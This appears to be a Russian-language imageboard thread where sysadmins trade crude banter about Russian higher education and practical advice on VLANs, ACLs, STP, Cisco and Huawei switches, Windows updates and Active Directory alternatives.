У нашего правительства план убрать все лишние ВУЗы, и сделать высшее образование элитарным, как в США, чтобы не каждый пидораха шёл за коркой, а были именно реальные специалисты, понимающие суть вопроса. А сам МТУ должен за сколько-то там лет попасть в мировой топ 500, как МГУ, поэтому такие и аббревиатуры, лол, не уверен, что взлетит, но там посмотрим
мимо закончившей заочку МИРЭА

Ответы63964 64538

16 янв, 11:24 636 1163964

>>63958

>чтобы не каждый пидораха шёл за коркой

Интересно как они это сделают если построенный совком социальный лифт без высшего образования не поднимает выше второго этажа.

Ответы63981

16 янв, 11:32 637 1163967

>>63412

Буду капать в DSR в L2 схеме.

16 янв, 11:39 638 1163973

>>63956

>МИРЭА

Я там отучился в нулевых. Всё ОК было, но там сильно роляла кафедра. Я был на ВМС на кафедре НИИАА. Учили реально хорошо, а на соседней кафедре того же факультета и специальности люди просто нихуя не делали годами...

>отучился в "Специалисте" на сетевика

Ой, ой. По мне так и сертифицированные курсы fast line по cisco не дают достаточно хорошей подготовки, а уж что там в Специалисте творится, вообще боюсь себе представить.

Но и твой и мой случай лишний раз доказывают, что качественное образование - это в первую очередь заслуга учащегося и было бы желание учиться, а возможность найдется.

>>63955

>ДОКУМЕНТЫ ВАЖНЫЕ ОТКРЫТЫ

Это всё легко решается созданием регламента и доведением его до сведения пользователей под подпись. Плюс комп не перезагружается внезапно, а предупреждает об этом сильно заранее. Если при таком раскладе кто-то теряет рабочие файлы - сам мудак, пусть остается в ночь и делает заново, лол.

>Начальник службы безопасности и IT-дир равны по рангу

>В принципе, так и надо.

Только по факту сотрудник отдела безопасности выше по иерархии, чем рядовой админ, т.к. первый последнему доступы ограничить может, а админ безопаснику - нет. В итоге равенство между IT и безопасностью в принципе невозможно, чтобы бы мы там формально не прописывали и не декларировали.

Ответы63985

16 янв, 11:49 639 1163981

>>63964

> не поднимает выше второго этажа

Я вангую, что у них наполеоновские планы, но на деле всё как обычно обосрётся не успев появиться
Думаю, что план такой: на обычных работников, выполняющих как конвейер рутинную операцию, перекладывающих бумажки и пишущих письма по электронной почте будут брать максимум после бакалавра, а то и после колледжа.
на главбуха, главадмина, главинженера должен идти минимум с хорошей вышкой, шарящий по всем направлениям господин, которые мыслит не в плоскости, а в пространстве

Что не устраивает сейчас? То, что у ВО нету ценности, даже дворники ходят с ВО и кассиры в пятёрочках, хотя им никогда эти знания не пригодятся, а ценность имеет только именитый вуз.
Поэтому зачем ждать пока пидораха просидит за 6 лет штаны в вузике, когда его можно отправить отучиться 3 года, получить базовые навыки в этом тупость российского образования,
так как за 3 года можно с 0 стать CCNP, который кроме сетей знать ничего не будет, но намного более квалифицированным специалистом, чем рашен колледж, и пойти платить налоги.
Студент же невыгодное явление для государства по мнению пыни, у нас бурить некому, или строить, а планктон не нужен, он долго учится и не платит налоги, а потом не выдаёт натуральное производство. А майнинг так вообще головная боль, так как пидорахи стали лучше жить, зачем работать за 15к в меся, если можно купить 1 вк и она будет тебе отбивать эту сумму сидя на жопе и двачуя капчу

Короче, идея средней паршивости, а зная российско-совковый менталитет ждём когда всё окончательно обосрётся под стандартами 70ых годов.
Насколько я знаю, у нас даже ТБ по работе за ПЭВМ не переписали, мы всё перед ЭЛТ ЧБ мониторами сидим, с подставкой

Ответы63988 63994

16 янв, 11:53 640 1163985

>>63973

>Я там отучился в нулевых. Всё ОК было, но там сильно роляла кафедра

Бля, как меня там матан заебал, "типовой расчёт" ой бляяя, я сейчас ряд фурье хуй разложу

Был на вычислительной технике

Ответы63994

16 янв, 11:54 641 1163988

>>63981

>тупость российского образования,

>так как за 3 года можно с 0 стать CCNP, который кроме сетей знать ничего не будет, но намного более квалифицированным специалистом, чем рашен колледж

Вот это двачую.

Ответы63994

16 янв, 12:00 642 1163994

>>63981
В чем-то ты прав. Точнее, во всем, что касается отечественного высшего образования. А неточность в непонимании системы вышки "там". В Европе/США практически никто вышку не получает, потому что вышка - это для тех, кто хочет заниматься научной деятельностью. И всякие выпускники IT-since в штатах - это не наши кодеры с запись в диплом "инженер-программист", а реальные ученые, разбирающиеся в вычислительной сложности алгоритмов, дискретной математике и прочих сложных вещах.

И количество ВУЗов то мы сократим, но вот только от этого выпускники того, что осталось не превратятся из кодеров в ученых!

>>63985
Да, первые 3 семестра ебали знатно: линейка, матан, ТФКП, диффуры, дискра, физика и большая часть этого всего параллельно и на весьма серьезном уровне. Но потом стало сильно проще - пошла специализация, а в IT у нас полный швах, да и математика то сильная осталась со времен совка - скоро и она деградирует, вероятно.

>>63988
Как будто что-то плохо. Выше уже написал - во всем мире простые люди идут таким путем и не знают проблем.

Ответы63996 63997

16 янв, 12:11 643 1163996

>>63994

> в IT у нас полный швах

Да, я когда защищался, так как был уже действующим админом, то ясен хуй брал сетевой диплом, просто переписал частями свой сети, и это пушка, антиплагиат показал 80% оригинального текста, диплом со всеми конфигами вышел на 150 страниц, я им рассказывал про бамп ссл трафика, про флаги пакетов, про то как можно наёбывать фаерволлы по длинне пакета, когда новая информация перезаписывает старую, про интеграцию линукса в АД ДС, про многоранговые сети, про то как упаковать IPsec в UDP, и вообще про всё, что актуально
Комиссия, и препод по сетям нихуя не понимали, по занятиям мы ушли чуть дальше модели ОСИ, поставили оценку "ОТЛИЧНО", так как рецензент написал "Отлично", пушка, короче
Но вот матаном, физикой и электротехникой я заебался на всю жизнь, хотя матан очень структурировал моё мышление, о том сколько приходилось решать первые 3 года не жалею

Ответы63998

16 янв, 12:15 644 1163997

>>63994

>во всем мире простые люди идут таким путем и не знают проблем

Да я бы тоже на "абразавание" хуй забил, и так вылетев с 4 курса, если бы после этого в армии сапогами не отпинали бошку так, что я понял, что без него в этой стране, если собираешься работать не на себя, никуда -

Тащемта и моя текущая должность требует высшего образования. Хорошо хоть не профильного, а то бы я и тут обосрался с моим дипломом гуманитария.

Ответы63998

16 янв, 12:20 645 1163998

>>63996
Согласен, матан был полезен только для мозгов, сам по себе ни разу не пригодился и сейчас окончательно забыт.

По поводу IT - комиссия состоит из старых дедов, они нихуя не секут ни в чем, а оценивают просто "доклад", ну то есть в целом как ты держишь, насколько уверенно говоришь, отвечаешь на вопросы.

Я защищал вообще не свою разработку, лол! Но в итоге получил отлично, а мой доклад сочли лучшим среди всех за день... из-за этого чуть было не случился скандал, потому что я "забыл" явиться на оглашение результатов защиты.

>>63997
Так и я шел в ВУЗ чисто ради откоса от армии. Но... на военку меня не взяли из-за... недобора веса. В итоге после выпуска пришлось полгода работать на оборонку по специальности за копейки (это такая извращенная форма откоса была), пока не мать не помогла с деньгами на покупку военника.

Ответы64000

54 Кб, 600x600

16 янв, 12:22 646 1164000

>>63998

>В итоге после выпуска пришлось полгода работать на оборонку по специальности за копейки (это такая извращенная форма откоса была), пока не мать не помогла с деньгами на покупку военника.

А я вообще на всё забил, пока за мной не приехали менты и не увезли в военкомат, откуда увезли в распределитель и срауз в часть.

Хороший пример того как не надо забивать на всё хуй.

Ответы64001

16 янв, 12:25 647 1164001

>>64000

>не надо забивать на всё хуй

На надо, но понять где грань мне очень сложно, сейчас читаю про биохакинг: https://vc.ru/26886-personal-biohacking и понимаю, что это чуть-ли не другая крайность...

16 янв, 15:16 648 1164040

Сетевики, расскажите в трёх словах о best practices в ACL между вланами/подсетями/рутером, на разных уровнях доступа/агрегации/ядра, какой трафик режете, какой разрешаете

Ответы64046 64545

16 янв, 15:36 649 1164046

>>64040
Всё зависит от задач. Как правило стараются делать как можно меньше ACL, т.к. они могут сильно влиять на производительность. Самое частое - предоставление влана подрядчикам без доступа ко внутренним сетям, т.е. инет-онли.

Ответы64048

16 янв, 15:39 650 1164048

>>64046
Наверное кассы и видеонаблюдение в отдельные вланы без доступа? как и телефония?

А LLDP вообще юзается где-то или нет?

Ответы64051

16 янв, 15:45 651 1164051

>>64048

>видеонаблюдение

Вообще для этого нужна отдельная изолированная физическая сеть, иначе никак. Равно как и для СКУДа. Иначе это будет уже не безопасность...

>кассы

Зависит от площадки. В отдельный влан то их выделяют, конечно, но скорее чтобы на роутере проще было PBRить, если нужно или на фаерволе фильтровать. Доступ из влана с кассами к пользакам и обратно никто не запрещает как правило, а иногда он и вовсе нужен буквально, т.к. некоторые кассы могут с компом по сети взаимодействовать.

>телефония

Она, конечно, в отдельном влане, если IP-телефония вообще есть, удовольствие очень дорогое. А LLDP юзается, например, с телефонами avaya, подключенными к коммутаторам cisco.

Ответы64053 64264 64321

16 янв, 15:52 652 1164053

>>64051

> avaya,

Я думал, что такое только сиська умеет, хм интересно

Ответы64369

16 янв, 22:14 653 1164264

>>64051
На одном из рабочих мест всё это было свалено в одну плоскую сеть. Описал как всё разбросать по вланам, запросил оборудование и кучу сетевых разеток с дополнительными шкафами коммутационными, мне сначала ответили нет проблем, купили с2960g 48 портовых несколько, часть с пое под телефоны, часть без, на "ядро" одну c3750g, я сел с ними экспериментировать (до этого не особо с реальным железом сидел). А потом резко перестали выделять бабло на ИТ, и отказали в розетках и коммутационных шкафах, так что на новое оборудование нормально было и не переехать. В итоге ушёл оттуда, а там всё ещё оборудование пылится, сеть плоская и розеток нет.

Ответы64369

17 янв, 00:33 654 1164321

>>64051

>Вообще для этого нужна отдельная изолированная физическая сеть, иначе никак.

Лол бля у нас камеры вообще ни к каким сетям не подключены и живут "своей жизнью". Как следствие что отсутствие оперативного доступа, что дикий рассинхрон во времени со всем остальным оборудованием и реальным временем.

Ответы64369

17 янв, 08:43 655 1164369

>>64053
Ну в плане телефонии авайя может даже и получше будет, чем циско.

>>64264 >>64321
Обычно "камеры" - это сеть видеонаблюдения, где помимо камер есть сервера, куда пишутся все видео-потоки и рабочие места безопасников, где на куче мониторов можно смотреть сразу десятки видео-потоков и быстро переключаться между ними. Если камеры приличные, то трафик они могут генерировать очень существенный, потому что даже если речь идет только о контроле всех входов/выходов/парковок/лифтов их нужно овер дохуя. Оно, конечно, может работать поверх пользовательского оборудования, но помимо нагрузок, есть еще и опасность атаки со стороны любого хуя с ноутом, который задосить камеру, например...

Ответы64380 64392

17 янв, 09:12 656 1164377

>>62884
Бля, аж появились пораженчиские мысли, съебать обратно в мухосрань и искать в анальных муках работу за 20к.

17 янв, 09:20 657 1164380

>>64369

>Ну в плане телефонии авайя может даже и получше будет, чем циско.

Смеешься что-ли? По личному опыту, телефонии от сиськи вообще не место в нормальной компании. Дорого и слишком неповоротливо. CUCM вообще ужасен.

Ответы64392

17 янв, 10:13 658 1164392

>>64380
>>64369
Про сиськи от части вздвачну, закупали до крымнаш циски по 2700р/трубка, после бума, я стал закупать фанвиллы, функционал больше, надёжность не хуже, как работает так и работает, а цена вместо 90$ всего 60

35 Кб, 600x394

17 янв, 11:12 659 1164436

Сетевики, срочно, вопрос про СТП: какие stp enhancements где используются, и используются ли вообще с приходом RSTP

Ответы64548

17 янв, 12:58 660 1164538

>>63958

>У нашего правительства план убрать все лишние ВУЗы, и сделать высшее образование элитарным, как в США,

План верный, в общем-то. Т.к. большинство абитуры идет в ВУЗы непонятно зачем. Исходя из вопроса "А где учат на программиста" если мы об ИТ. Если такой вопрос возникает, то это не в ВУЗ надо, а в техникум.

17 янв, 13:06 661 1164545

>>64040
Не знаю какие там best practice, скажу, как это сделано у нас.
По факту у нас почти нигде нет никаких ACL.
Между пользователями трафик никак не режется. Пользовател разбиты на Vlan по этажам.
Есть гостевые сегменты, они отделены от пользовательсоко фаерволлом.
Пилить ACL руками считаю неправильным. Нужно как можно меньше создавать такой ручной работы, иначе можно в ней утонуть к чертовой матери.

Ответы64563

17 янв, 13:10 662 1164548

>>64436

>Сетевики, срочно, вопрос про СТП: какие stp enhancements где используются, и используются ли вообще с приходом RSTP

STP enhancements???
У нас STP (точнее RSTP) работает по дефолту. Единственное, что меняем, это priority на коммутаторах, которые выступают ядром/распределением. STP это вообще такая тема, которую, как многие считаю, лучше не трогать и не опираться на него.
Использование M-LAG и LACP и ьтехнологий стекирования коммутаторов нифелирует надобность тюнинговать STP для отказоустойчивости.

Ответы64552

17 янв, 13:12 663 1164552

>>64548

>У нас STP (точнее RSTP) работает по дефолту.

ну всякие portfast, bpduguard, bpdufilter используем где надо, конечно же. Но глобально СТП не трогаем.
Вообще я считаю, что в сети надо L2 домен как можно больше сужать и роутинг выводить даже на уровень доступа, если есть такая возможность. А дальше уже L3 и динамический роутинг.

Ответы64561

14 Кб, 436x310

17 янв, 13:21 664 1164561

>>64552

>роутинг выводить даже на уровень доступа

Я, конечно, нихуя не CCNA, но мне казалось, что рутер слишком дорогой, и межденный по сравнению с асиками в коммутаторах, где цена за порт в тысячу раз меньше

а разве LACP должно исключать RSTP в том же ядре? Я просто сколько читаю, там любят соединять коммутаторы перекрёстно, или эти картинки подразумевают виртуализацию коммутаторов?
Как на пике

Ответы64570 64576

17 янв, 13:22 665 1164563

>>64545
То есть ACL по сути только на межсетевом экране, где запрещается все кроме прокси и тп?

Ответы64570

17 янв, 13:30 666 1164570

>>64561

>Я, конечно, нихуя не CCNA, но мне казалось, что рутер слишком дорогой, и межденный по сравнению с асиками в коммутаторах, где цена за порт в тысячу раз меньше

Сейчас все коммутаторы умеют L3, хотя бы урезанный. И вот такие коммутаторы ставятся на доступ. С ядром и распределением L3-стыки и роутинг. Роутеры тут не нужны, т.к. коммутаторы умеют L3. Такой дизайн поможет избежать проблем на L2 уровне, всякие петли и т.д. и даст ECMP. Ну и даст возможность гибко регилировать политики на фаерволле. С L3 проще работать, чем с L2. Может у кого-то другое мнение, было бы интересно узнать.
>>64563

>То есть ACL по сути только на межсетевом экране, где запрещается все кроме прокси и тп?

ну что-то вроде того.
На фаерволле разграничен доступ из сегментов ДМЗ в сегмент серверов, из пользовательского сегмента в сегмент серверов.
Также на фаерволле (у нас) терминируются туннели и разграничивается трафик из филиалов в сегменты ДМЗ и серверов...ну и так далее.

Также лично у нас в каждом из наших филиалов стоят аппаратеные фаерволлы, на которых мы резем трафик, пробрасываем порты и так далее.
Просто это удобнее, т.к. есть единая консоль управления всеми этими фаерволлами.

Ответы64598

17 янв, 13:35 667 1164576

>>64561
имеется виду покупать L3 свичи на доступ аля Cisco 3650 у которых аплинковые порты будут сразу в роутед режиме (т.е. адрес вешается прям на порт, а не на SVI), у такого подхода есть как плюсы (полная утилизация всех аплинков) так и минусы (на каждом акцесс свиче свои вланы), самый топовый вариант Campus Fabric.
На пике свичи аггрегации либо в стеке, либо MLAG, со стороны акцес свичей они выглядят как один.

Ответы64595 64598

17 янв, 13:46 668 1164595

>>64576

> либо в стеке, либо MLAG

либо VSS, йоу!

17 янв, 13:48 669 1164598

>>64576

>MLAG

А он работает на l2? В случае ядра и агрегации, наверное да, там mlag, но вроде l2 коммутаторы в него не могут
Или я путаю?
>>64570

> все коммутаторы умеют L3

Даже 2960? Он вроде не умеет делать no switchport
Или я тут тоже путаю

Ответы64618 64628

17 янв, 13:56 670 1164618

>>64598

>А он работает на l2?

MLAG технология, которая поддерживается на L3 коммутаторах. На коммутаторах, которые L3 не понимают, просто не нужна его поддержка.

>Даже 2960?

Это надо даташиты смореть. Возможно какие-то из 2960 и умеют. Хотя сомневаюсь.
Циска сейчас вообще позиционирует свои 3850 как коммутаторы доступа/распределения. Но по мне это очень уж круто лдя большинства конторок.

Ответы64626 64652

17 янв, 14:00 671 1164626

>>64618
Вот-вот и я про то

17 янв, 14:01 672 1164628

>>64598

>Даже 2960?

Вроде 2960 с прошивкой IP Lite поддерживает l3

Ответы64652

17 янв, 14:21 673 1164652

>>64628

>IP Lite

Рассказывай что это такое и с чем это едят

>>64618

>Циска сейчас вообще позиционирует свои 3850 как коммутаторы доступа/распределения

Я думаю, что они охуели, и вообще отказались от нищенских сегментов, Cisco Catalyst 2960-48, стоит сейчас тысяч 30, это я понимаю, приемлемо для мелко-средней конторы и 200к за 3850 - охуели мрази, что ли, 500$ vs 3000$, я думаю, что даже в яндексе не закупают такие коммутаторы, цена на порт безумная, особенно для рядовых юзеров и принтеров

Ответы64658

17 янв, 14:25 674 1164658

>>64652

>что даже в яндексе не закупают такие коммутаторы, цена на порт безумная, особенно для рядовых юзеров и принтеров

Я думаю закупают в каких-нибудь госах, где надо перепилить и освоить бюджет.

>Рассказывай что это такое и с чем это едят

вот тут фигурирует
https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-2960-x-series-switches/data_sheet_c78-728232.html

Ответы64667

17 янв, 14:29 675 1164667

>>64658
Да, почитал, только на 2960-XR серии, где 48 портов тоже стоит 200к, всё равно жесть, можно брать и 3850 с таким же успехом

85 Кб, 1104x521

17 янв, 14:33 676 1164672

Антонасы, больше негде спросить, лол.
Как определить ревизию железки из консоли?

Ответы64673 64676

17 янв, 14:34 677 1164673

>>64672
PS на самом устройстве не написано. только модель

17 янв, 14:35 678 1164676

>>64672
display version не дает?

Ответы64678 64690

17 янв, 14:39 679 1164678

>>64676
а, я пробую show и удивляюсь. спасибо

17 янв, 14:47 680 1164690

>>64676
а серийник устройства можно как-нибудь получить?

Ответы64693

17 янв, 14:49 681 1164693

>>64690

>а серийник устройства можно как-нибудь получить?

Попробуй проискать в display diagnostic-information
Будет мноог лишнего, но серийник должен быть.

17 янв, 16:36 682 1164748

Какую винду для офиса сейчас стоит закупить? Поискать 7, или плюнуть и покупать 10? Семёрку через пару лет перестанут поддерживать, а у Десятки иппать сколько глюков. Недавно ещё пять штук в офис поставили, так у меня половина вызовов с этих компов. То одно отвалится, то другое не работает, то третье тормозит. Но за ней, как ни крути, мативо, будущее. Я, конечно, такое будущее в гробу видал, но против прогресса не попрёшь же.

Ответы64750 65177

17 янв, 16:41 683 1164750

>>64748
у нас 10ка убила с пол сотни ПК аппрувеным апдейтом с всуса, пидоры мягкие
Если штат на 7, то лучше 7 купи, хотя тяжело найти

Ответы65177

17 янв, 16:59 684 1164759

Што-то я не понимаю.
Есть l2 хуявей 2700. Я создал юзера, дал ему 3 лвл.
Но в дефолтную веб-морду он зайти не может.
По ssh при этом ходит без проблем.

Может, для морды есть какой-то отдельный сервис, который надо разрешить для этого юзера? Как-то я пока не понимаю логики работы хуявеев.

10 Кб, 512x326

18 янв, 10:04 685 1165127

антонасы, отправляют меня ставить оборудование на точку, а я как-то и не шарю особо.
в точке готовый канал, мне дадут 1 маршрутизатор и 3 коммутатора (много юзеров)
маршрутизатор уже настроен под канал

насколько я понимаю, схема должно быть как на пикрл

1. есть ли на коммутаторах специальный порт, которым они соединяются друг с другом (а не с обычными хостами)? модель не знаю. какую дадут. ну обычно есть? или можно втыкать в любой порт, а маршрутизатор фактически будет думать, что это один большой коммутатор перед ним?

Ответы65130

18 янв, 10:08 686 1165128

2. что такое комбо wan порт? это для резервирования каналов, когда есть два вана?

18 янв, 10:09 687 1165130

>>65127

>есть ли на коммутаторах специальный порт, которым они соединяются друг с другом (а не с обычными хостами)?

Обычно есть такие порты. При условии, что коммутатор управляемый и как-то изначально настроен. Если настраивал не ты, то тебе должны были сказать, в какой порт включать коммутатор.

>что такое комбо wan порт? это для резервирования каналов, когда есть два вана?

Не знаю, какая-то видимо маркетинговая терминология конкретного вендора.
Схему я бы поменял, включив оба коммутатора в тот коммутатор, в который включен роутер.

Ответы65139 65148

23 Кб, 1075x434

18 янв, 10:21 688 1165139

>>65130

>включив оба коммутатора в тот коммутатор, в который включен роутер

Подожди, это как?

Ответы65140

18 янв, 10:26 689 1165140

>>65139

>Подожди, это как?

Я бы сделал вот так, как справа.
Но все зависит от того, как в том офисе сделана СКС, может так не получится. Но это в общем-то не обязательно. Просто не люблю включать свитчи последовательно друг за другом, как-то это не принято, на мой взгляд.

Ответы65145

18 янв, 10:31 690 1165145

>>65140
логично, так меньше точек отказа. ок, спасибо.

18 янв, 10:34 691 1165148

>>65130

>Обычно есть такие порты.

А как они называются?

Ответы65179

18 янв, 10:56 692 1165159

Одмены, как сохранить конфигурацию на s2700?
Ребутнул и все почему-то слетело.

Ответы65163

18 янв, 11:05 693 1165163

>>65159
соврал -
после ребута, отключены службы ssh/sftp
почему?

Ответы65169

18 янв, 11:11 694 1165169

>>65163
и почему-то отвалился ип от Vlanif1 и запустился autoconfig

18 янв, 11:17 695 1165177

>>64748
По MS EA подписываешься на ту винду, которая продается, но имешь право даунгрейда. Семерка в личном кабинете еще есть.
>>64750

>аппрувеным апдейтом с всуса

А на каком основании аппрувили, тогда уж?

Ответы65199

279 Кб, 1124x196

18 янв, 11:21 696 1165179

>>65148

>А как они называются?

Они обычно выгляждят так. Их настраивают в режиме "trunk" как правило.
Но если у тебя офис маленький, то нет надобности в таких коммутаторах.

18 янв, 11:51 697 1165199

>>65177
на таком, что админ поставил автоапрув, а майки запустили обновление, которое убило шинду
не могу найти новость лучше: http://www.ntv.ru/novosti/1939660/
Вот мы на это попали

Ответы65335

18 янв, 14:57 698 1165335

>>65199

>майки запустили обновление, которое убило шинду

У них это регулярно.

>админ поставил автоапрув

С одной стороны, все ручками муторно, с другой - что ж, ССЗБ. По идее, нужен пул смертников на такой случай, куда апдейты аппрувятся автоматом. И если за неделю ничего не сломалось, то можно этот список одобрять и для всех.

Ответы65380 65394

18 янв, 15:56 699 1165380

>>65335

> По идее, нужен пул смертников на такой случай, куда апдейты аппрувятся автоматом. И если за неделю ничего не сломалось, то можно этот список одобрять и для всех.

Это называется тестирование. И нормальные админы так и делают. Пусть обновы ставятся с опозданием в неделю, но хотя бы офис не ляжет в миг.

Ответы65394 65797

18 янв, 16:09 700 1165394

>>65335
>>65380
Надо самому всус поковырять, я его последний раз видел дома на виртуалке

165 Кб, 480x360

19 янв, 09:46 701 1165797

>>65380

>Это называется тестирование.

Обязательно на конечных пользователях это тестировать?

Ответы65800

19 янв, 09:51 702 1165800

>>65797
Можешь поднять с десяток разных виртуалок, с разными ОС, с разными доступами и задачами, сертификаты/софт и тестить

Ответы65801

19 янв, 09:53 703 1165801

>>65800
Как бы за те ебические бабки, которые платятся Майкрософт за их софтину, они не должны заниматься тестированием на своей стороне?

Ответы65802

19 янв, 09:56 704 1165802

>>65801
Они занимаются, просто бывают корявые апдейты, так как майки - пидорасы, и понимают, что никуда ты от них не уйдёшь
Какая альтернатива АД ДС? ОпенЛДАП? да хуй там плава, или от ЛДАП от маков в цену выше на порядок
У нас бедные эникеи бегали и восстанавливали с загрузочных дисков лол

Ответы65993

19 янв, 10:00 705 1165803

Работаю год в конторе типа эникеем (на самом деле просто мальчиком, который с компуктерами ладит). Так вот я все это время ничего как администратор сети не делал. Хочу, так скажем, повысить свою квалификацию и полезность. С чего можно начать? Есть локальная сеть на рутере тплинк и коммутаторах, раскиданных по кабинетам. Можно администрировать сеть из 7 винды, не имея серверной оси? Дайте советов.

Ответы65808

19 янв, 10:26 706 1165808

>>65803
Сети начни с просмотра этого:
https://www.youtube.com/watch?v=Z-a7MNStFQs
Потом скачай и установи Wireshark, и потесть пакеты, которые ходят внутри сети, просто ради интереса, посмотри разные уровни и их заголовки

Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп

Мой совет по винде: https://www.youtube.com/channel/UCWF81cTBJoXQ-R4bClTBPUg

Очень годный, хоть и очень занудный канал, тут почти вся винда, разве, что powershell не рассматривается

и да, эникей - это и есть мальчик по компам, который нихуя не делает кроме вордов и екселей

Ответы65830

19 янв, 11:04 707 1165830

>>65808
С wireshark'ом я уже по приколу сидел.

>Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп

Не понял. Нужно поставить серверную винду на виртуалку и обычную тоже на виртуалку? Это же для обучения только или можно с реальной сетью работать с виртуально серверной винды?

>Без серверной ОС - нет

Это же еще нужен компьютер, на котором сервер будет круглосуточно работать? Без нее нельзя впн сделать? Еще есть же всякие проги для администрирования сети или они не подходят?

Ответы65832 65842

19 янв, 11:08 708 1165832

>>65830

>проги для администрирования сети

Что ты имеешь в виду? Администрирование сети - это управление сетевыми устройствам. Но по факту у тебя, скорее всего, и управлять то нечем, кроме туполинк-роутера.

19 янв, 11:21 709 1165842

>>65830

>С wireshark'ом я уже по приколу сидел.

Тут суть в том, что бы понять уровни: биты/фреймы/пакеты
понять заголовки всего, что куда и откуда, как вообще всё это ходит в сети, как разделяется одно от другого
В вайршарк есть прямо три подпункта в каждом перехваченном кадре: заголовок кадра, заголовок IP пакета, заголовок TCP и сама информация внутри TCP

>>Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп

>Не понял. Нужно поставить серверную винду на виртуалку и обычную тоже на виртуалку? Это же для обучения только или можно с реальной сетью работать с виртуально серверной винды?

1 - во всём мире используется виртуализация, покупается сервак с 1/2/4 и более процессорами, и сотней гигов ОЗУ и на нём нарезаются виртуалки под задачи. Вообще так и делают покупают физических 1-2-3 сервака и делают десятки виртуалок. Тут есть наёб с лицензированием, например "лицензия на физический процессор" или "лицензия на 1 ЦПУ и 1 виртуалку" и тп
На физический сервер ставят сразу ОС для виртуализации, то есть могут и без винда+Гипервизор, а чисто ВМВАР, и под ним уже режут как хотят
2 - ставь сначала для ознакомления, ты там по перваку столько дров наломаешь, что сам охуеешь, гугли вгугле VirtualBox, там можно создавать логические сети и объединять в них виртуальные ОС, вот первое задание для тебя: Поставь винсервер и подними DHCP + DNS, это просто и делается визардом, но что надо вводить в визарде придётся изучить

>>Без серверной ОС - нет

>Это же еще нужен компьютер, на котором сервер будет круглосуточно работать? Без нее нельзя впн сделать? Еще есть же всякие проги для администрирования сети или они не подходят?

Прог никаких нету, прога для администрирования сети - путти, что бы ты мог по SSH цепляться в сетевому оборудованию и вводить команды.

Пока делай всё на своём ПК, просто тестируй и смотри как работает, на сеть в 7 ПК нету смысла делать какие-то сервера, я бы вообще поставил на такую сеть (я так и ставлю) дешманский кунап с 2 дисками для файловой помойки и роутер тысяч за 6 рублей, уровня RT-AC66U от ануса, он более-менее производительный, там удобная вебка и есть встроенный ВПН сервер

Для продакшена уже другие задачи, начни с того, что я написал выше - посмотри ролики и поставить ВиртуалБокс с 2012 виндой и 7кой

19 янв, 11:21 709 1165842

>>65830

>С wireshark'ом я уже по приколу сидел.

>>Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп

>Не понял. Нужно поставить серверную винду на виртуалку и обычную тоже на виртуалку? Это же для обучения только или можно с реальной сетью работать с виртуально серверной винды?

>>Без серверной ОС - нет

>Это же еще нужен компьютер, на котором сервер будет круглосуточно работать? Без нее нельзя впн сделать? Еще есть же всякие проги для администрирования сети или они не подходят?

19 янв, 14:12 710 1165993

>>65802

>Какая альтернатива АД ДС? ОпенЛДАП?

Насколько мне известно опенлдап это именно лдап и только он, а АД это комбайнер огромный, с ключевой фишкой в групповых политиках. Вроде бы опенлдап в такое не может. Самба последняя может, и я даже видел её в роли домайн-контроллера, но пока это как-то ненадёжно выглядит.

Ответы66001 66052

19 янв, 14:20 711 1166001

>>65993

>Самба последняя может

Ага, но под самбу ещё надо линуксойда найти,плюс нету поддержки и гарантии работы, а виндузятник стоит 60-70к в месяц

Ответы66005

19 янв, 14:27 712 1166005

>>66001
Так линуксоид ещё дешевле стоит, потешные пердольки никогда особо на рынке не котировались.

Ответы66044

19 янв, 14:58 713 1166044

>>66005

>потешные пердольки

>RedHAt

ага, мань, я посмотрю куда ты будешь ставить оракл в продакшене, или proxy, или всякие там SIEM и DLP, только безумцы делают все исключительно на шиндоус, так это не работает
жирнота

Ответы66049

19 янв, 15:10 714 1166049

>>66044
У нищебродов без денег на лицензии от M$ конечно не работает. В сбербанке вот всё на винде, и в газпроме тоже.

Ответы66053 66078

19 янв, 15:19 715 1166052

>>65993

>Самба последняя может, и я даже видел её в роли домайн-контроллера, но пока это как-то ненадёжно выглядит.

Гуйню все равно от МС использовать, ибо так это ну просто пиздец. А в целом, Самба уже может быть контроллером, но с целой кучей костылей и ограничений.

19 янв, 15:19 716 1166053

>>66049

>В сбербанке вот всё на винде, и в газпроме тоже.

Не всё, но домен виндовый, да.

3,4 Мб, 1409x1913

ДВА С ПОЛОВИНО!1!! 19 янв, 15:52 717 1166076

Два с половиной года я и шеф сидели подали от начальства и основной движухи в другом корпусе аж через дорогу - ведь оборудованию и серверам похуй откуда их перезагружают.

И тут пошли новости что начальство переселяет нас в основной корпус аккурат в коридор, куда выходят кабинеты начальников управлений и отделов - чтобы было проще контролировать и ебать.

Дисциплину не нарушаем нарушаем так, чтобы остальные об этом не знали, по работе косяков за нами нет - а всё равно хотят переселить - безумные женщины-начальники с синдромом начальника.

И ведь это значит что НУЖНО БУДЕТ ПРИХОДИТЬ ВОВРЕМЯ АААРРР - а я уже так привык приходить позже на пол часа. А ещё будет нужно отмечаться в СКУД - когда у нас в корпусе этой системы вообще не установлено и вообще приходи/уходи когда хочешь - выпалить тебя могут только по телефонному звонку.

Увы - всё в этой жизни кончается. В том числе прекрасное сычевание в необорудованном СКУД корпусе на отшибе от начальства.

60 Кб, 981x666

19 янв, 15:55 718 1166078

>>66049

>всё на винде

и роутер тоже

Ответы66346

19 янв, 19:09 719 1166249

>>63304
Pass-the-hash /thread

Мимо студент учившийся на админа и вынужденный чинить принтеры.

Ответы66526

19 янв, 21:41 720 1166346

>>66078
Ну так роутер и не на линуксе, он от циски и на ios.

Ответы66749

20 янв, 12:26 721 1166526

>>66249

>Мимо студент учившийся на админа

На админа надо учится? Я думал достаточно 9 классов и трехнедельных курсов.
мимо менеджер ИТ-проектов/бизнес-аналитик из банка

Ответы66527

20 янв, 12:26 722 1166527

>>66526
По факту достаточно мануал загуглить.

20 янв, 18:32 723 1166749

>>66346

> Ну так роутер и не на линуксе, он от циски и на ios.

